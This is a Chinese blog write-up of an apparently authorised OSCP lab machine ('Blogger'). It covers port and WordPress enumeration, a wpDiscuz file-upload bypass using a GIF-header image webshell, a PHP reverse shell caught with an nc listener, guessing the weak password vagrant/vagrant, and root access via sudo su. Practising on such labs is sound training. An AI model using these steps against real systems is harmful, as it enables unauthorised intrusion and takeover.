从WEB到内网&&文件上传&&内网弱口令&&sudo提权 ------- 打靶经验分享

最新推荐文章于 2025-03-18 20:02:11 发布
最新推荐文章于 2025-03-18 20:02:11 发布
阅读量256 收藏
点赞数
文章标签: web安全 网络安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53003652/article/details/132495471
版权

OSCP靶机-------Blogger
今天来打一个OSCP的靶机,难度偏高,包含了端口探测,服务探测,ssh弱口令,CMS识别,文件上传绕过,nc反弹shell,sudo提权等等…靶场难度中等偏高,需要收集两个flag,一个flag低权限shell就可以获取,第二个要提权后才可以获取。希望大家看完可以有所收获。

启动环境

启动VPN:openvpn universal.ovpn
在这里插入图片描述
攻击机IP为:192.168.45.181
在这里插入图片描述
目标靶机IP为: 192.168.187.217

信息收集

1.端口
nmap扫描端口
nmap --min-rate 10000 -p- 192.168.187.217
在这里插入图片描述
只有22,80两个端口
22-ssh 80-http
2.端口测试
2.1 22-ssh
手工弱口令登一下试试。
ssh root@192.168.187.217 -p 22
在这里插入图片描述
ssh公钥有问题,无法继续。那么想用hydra爆破也就行不通了。
2.1 80-http
访问192.168.187.217:80
在这里插入图片描述
看上去很精致,应该黑丝有cms,直接查一下。
whatweb http://192.168.187.217:80
在这里插入图片描述
匪夷所思,是blogger么?msf搜一下。
msfconsole
searchsploit Blogger
在这里插入图片描述
没有。换思路,看一下源码:
curl http://192.168.187.217:80
在这里插入图片描述
没什么有用的信息。那就dirsearch扫一下目录。
dirsearch -u http://192.168.187.217
在这里插入图片描述
看一下assets。
访问192.168.187.217:80/assets
在这里插入图片描述
是一个目录遍历。就是这个网站的一些css、js、fonts图标等等。
不过在fonts中有一个blog文件。看上去在记录owasp top10。
在这里插入图片描述
在这里插入图片描述
随便点点,发现会跳转到一个域名blogger.thm。
在这里插入图片描述
看上去要绑定hosts:
vim /etc/hosts
然后在最后加上
192.168.187.217 blogger.thm
在这里插入图片描述
再次访问刚才的blog站点。正常咯。
在这里插入图片描述
看一下cms:
whatweb http://blogger.thm/assets/fonts/blog/
在这里插入图片描述
cms是WordPress 4.9.8,搜一下exp看看。
msfconsole
searchsploit WordPress 4.9.8
在这里插入图片描述
全是插件,也没有rce,wp老漏洞大户了,肯定有专门的wp扫描:wpscan
kali里就有,直接用:
wpscan --url http://blogger.thm/assets/fonts/blog/
在这里插入图片描述
出洞了,http://blogger.thm/assets/fonts/blog/wp-content/uploads/有文件上传。
在这里插入图片描述
还是文件遍历,找不到什么随便点点。发现一个php
在这里插入图片描述
在这里插入图片描述
点进去发现了gif的文件头。应该网站里是有一个上传图片的地方。慢慢找一下。在wp的页面,owasp top10中有上传图片的地方。在这里插入图片描述
这应该是wordpress的组件,源代码定位一下。
在这里插入图片描述
调用的wpdiscuz的组件,抓一下网络的包。
在这里插入图片描述
现在确认了版本信息:wpdiscuz 7.0.4
msf搜索exp
msfconsole
searchsploit wpdiscuz 7.0.4
在这里插入图片描述
search wpdiscuz 7.0.1
在这里插入图片描述
use 0
show options
在这里插入图片描述
set lhost 192.168.45.181
set rhosts 192.168.187.217
set blogpath /assets/fonts/blog/?p=29
run
在这里插入图片描述
失败。。。。回去试试手工文件上传。
经过测试只能上传gif文件,先制作一个图片马。
copy 1.jpg/a +shell.php/b shell.jpg
1.jpg为正常的图片,尽可能选择小点的图片,shell.php 为 php一句话木马。
准备上传,打开burpsuite,抓包改一下文件头看能否上传。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
可以看到上传的位置,直接蚁剑链接。
在这里插入图片描述
在这里插入图片描述
有shell了!

内网渗透

利用python获取交互shell
python -c "import pty;pty.spawn('/bin/bash')";
获取flag:
find / -name local.txt 2>/dev/null
cat /home/james/local.txt
在这里插入图片描述

提权

1.sudo提权
sudo -l
在这里插入图片描述
2.suid提权
find / -perm -u=s -type f 2>/dev/null
在这里插入图片描述
没合适的。
3.suid-getcap提权
/usr/sbin/getcap -r / 2>/dev/null
在这里插入图片描述
4.Cron job提权
cat /etc/crontab
查找定时任务。
在这里插入图片描述
5.内核overlayfs提权
lsb_release -a 看看发行版本
在这里插入图片描述
Ubuntu 16.04.7 LTS 符合
uname -a看看内核版本
在这里插入图片描述
内核版本 4.4.0-206 不符合

内网信息收集

看一下用户:
ls -al /home
在这里插入图片描述
看一下是否有隐藏文件
ls -al /home/james
在这里插入图片描述
内网用户密码弱口令爆破,vagrant/vagrant成功了
在这里插入图片描述
但蚁剑好像不太对劲。
这蚁剑的一句话shell就不太行啊,重新拿shell。用kali的webshell:
cp一个出来
sudo cp /usr/share/webshells/php/php-reverse-shell.php exp
在这里插入图片描述

改后缀。
cp php-reverse-shell.php ./shell.jpg
修改监听ip和端口:
vim php-reverse-shell.php
在这里插入图片描述
nc开启监听:
nc -lvvp 1234
在这里插入图片描述
上传该文件,burpsuite抓包修改GIF89a头。
在这里插入图片描述

访问地址之后成功getwebshell
在这里插入图片描述

二次提权

重复之前的操作,vagrant弱口令登录。
1.sudo提权
在这里插入图片描述
存在(ALL) NOPASSWD: ALL
su提权
sudo su
在这里插入图片描述
成功提权
获取flag2:cat /root/proof.txt
在这里插入图片描述

机器学习均方误差根(RMSE:Root Mean Squared Error
IT古董
11-08 3703
均方误差根(Root Mean Squared Error,RMSE)是机器学习和统计学中常用的误差度量指标,用于评估预测值与真实值之间的差异。它通常用于回归模型的评价,以衡量模型的预测精度。
均方误差MSE)、均方根误差(RMSE)、平均绝对误差(MAE)、决定系数(R²)解释
weixin_43155435的博客
06-13 5万+
均方误差MSE)、均方根误差(RMSE)、平均绝对误差(MAE)、决定系数(R²)解释
RMSE(均方根误差)、MSE均方误差)、MAE(平均绝对误差)、SD(标准差)
热门推荐
敲代码的quant的博客
08-24 25万+
RMSE(Root Mean Square Error)均方根误差 衡量观测值与真实值之间的偏差。 常用来作为机器学习模型预测结果衡量的标准。 MSEMean Square Error均方误差 MSE是真实值与预测值的差值的平方然后求和平均。 通过平方的形式便于求导,所以常被用作线性回归的损失函数。 MAE(Mean Absolute Error)平均绝对...
均方误差Mean Squared Error, MSE,方差(Variance)、偏差的平方(Squared Bias)和误差的方差(Variance of Error
最新发布
weixin_48846514的博客
03-18 717
均方误差Mean Squared Error, MSE,方差(Variance)、偏差的平方(Squared Bias)和误差的方差(Variance of Error
深度解析回归模型评估指标:MAE、MSE、RMSE 与 R² 的详细讲解
cnzzs的博客
02-08 7360
下面是对 MAE、MSE、RMSE 和 R² 四个指标的详细解释、计算公式、特点以及应用场景的说明:1. MAE(平均绝对误差)定义: MAE(Mean Absolute Error)表示预测值与真实值之间绝对误差的平均值。公式:其中, 为真实值, 为预测值, 为样本数。特点:直观性: MAE 直接反映了预测误差的平均水平...
方差、标准差、均方误差的总结
TiRan_Yang
01-24 1万+
方差   百度百科中关于方差的解释为:(variance)是在概率论和统计方差衡量随机变量或一组数据时离散程度的度量。概率论中方差用来度量随机变量和其数学期望(即均值)之间的偏离程度。统计中的方差(样本方差)是每个样本值与全体样本值的平均数之差的平方值的平均数。在许多实际问题中,研究方差即偏离程度有着重要意义。   方差是衡量源数据和期望值相差的度量值。   假设有一组离散的数据xn=[x1
机器学习小组知识点1:均方误差(MSE)
Eric2016_Lv的博客
10-14 6万+
均方误差单独扽概念是很简单的,这里只做介绍,更深一步的内容会在后面列出来。 SSE(和方差、误差平方和):The sum of squares due to error MSE(均方差、方差)Mean squared error RMSE(均方根、标准差):Root mean squared error R-square(确定系数):Coefficient of determination
机器学习均方误差MSEMean Squared Error
IT古董
11-05 5024
均方误差Mean Squared Error, MSE)是衡量预测值与真实值之间差异的一种方法。在统计学和机器学习中,MSE 是一种常见的损失函数,用于评估模型的预测准确性。
MSE-均方误差
Major_S的博客
09-06 1461
MSE均方误差MSE-均方误差MSE均方误差
均方误差
qq_43228162的博客
09-24 4万+
均方误差 一、均方误差的含义及公式 均方误差是衡量“平均误差”的一种较方便的方法,可以评价数据的变化程度。从类别来看属于预测评价与预测组合;从字面上看来,“均”指的是平均,即求其平均值,“方差”即是在概率论中用来衡量随机变量和其估计值(其平均值)之间的偏离程度的度量值,“误”可以理解为测定值与真实值之间的误差。 均方误差的公式:MSE =。 二、均方误差的推导 均方误差可以通过平均误差来推导: 平...
评价指标1. 均方误差Mean Squared ErrorMSE):
03-27 2431
评价指标
均方误差MSE matlab
12-05
均方误差MSE matlab
MSE.zip_mean_mean squared error_mse_neural network
07-15
**均方误差Mean Squared Error, MSE)在神经网络中的应用** 均方误差机器学习,特别是神经网络领域中广泛使用的一种损失函数(Loss Function),用于衡量模型预测值与真实值之间的差异。它在评估模型性能时起着...
MSE_MSE的大小_求两幅图像之间的均方误差MSE_图像mse误差_源码
10-04
在图像处理领域,均方误差Mean Squared ErrorMSE)是一种衡量两幅图像相似度的常用指标。它通过计算两幅图像对应像素点差异的平方和的平均值来评估它们之间的差异程度。MSE的大小直接反映了图像之间在像素级别的...
MSE.rar_mean_mean-squared error _mse
09-20
标题"MSE.rar_mean_mean-squared error _mse"和描述"Mean squared normalized error performance function"都指向了信号处理和机器学习领域中的一个关键概念——均方误差Mean Squared Error,简称MSE)。均方误差...
方差、标准差、均方差、均方误差区别总结
XiaoXiao_Yang77的博客
03-09 3328
一、百度百科上方差是这样定义的: 方差(variance)是在概率论和统计方差衡量随机变量或一组数据时离散程度的度量。概率论中方差用来度量随机变量和其数学期望(即均值)之间的偏离程度。统计中的方差(样本方差)是各个数据分别与其平均数之差的平方的和的平均数。在许多实际问题中,研究方差即偏离程度有着重要意义。 看这么一段文字可能有些绕,那就先从公式入手, 对于一组随机变量或者统计数据,其期望...
均方误差MSE
cx1120w的博客
03-10 1701
均方误差mean-sqare error) 对估计量θ^\hat{\theta}θ^而言,其均方误差MSE(θ^\hat{\theta}θ^)衡量了估计量θ^\hat{\theta}θ^与参数真值θ\thetaθ间的距离,是评价一个估计好坏的最常用标准。MSE(θ^)=E{(θ^−θ)2}=var(θ^)+b2(θ^)MSE(\hat{\theta})=E\{(\hat{\theta}-\the...
Mean squared error MSE即方差
kunlong0909的专栏
10-24 1万+
MSE是网络的性能函数,网络的均方误差,叫"Mean Square Error"。比如有n对输入输出数据,每对为[Pi,Ti],i=1,2,...,n.网络通过训练后有网络输出,记为Yi。   在相同测量条件下进行的测量称为等精度测量,例如在同样的条件下,用同一个游标卡尺测量铜棒的直径若干次,这就是等精度测量。对于等精度测量来说,还有一种更好的表示误差的方法,就是标准误差。   标准误差定义为
什么是均方误差MSE)?
03-28
均方误差Mean Squared Error,简称MSE)是一种常用的评估回归模型性能的指标。它衡量了模型预测值与真实值之间的平均差异程度。 计算MSE的步骤如下: 1. 对于每个样本,计算模型的预测值与真实值之间的差异(残差)。 2. 将每个残差平方,得到平方误差。 3. 对所有样本的平方误差求平均,得到均方误差MSE的公式如下: MSE = (1/n) * Σ(yi - ŷi)² 其中,n表示样本数量,yi表示真实值,ŷi表示模型的预测值。 MSE的值越小,表示模型的预测结果与真实值之间的差异越小,模型性能越好。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

芝士土包鼠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值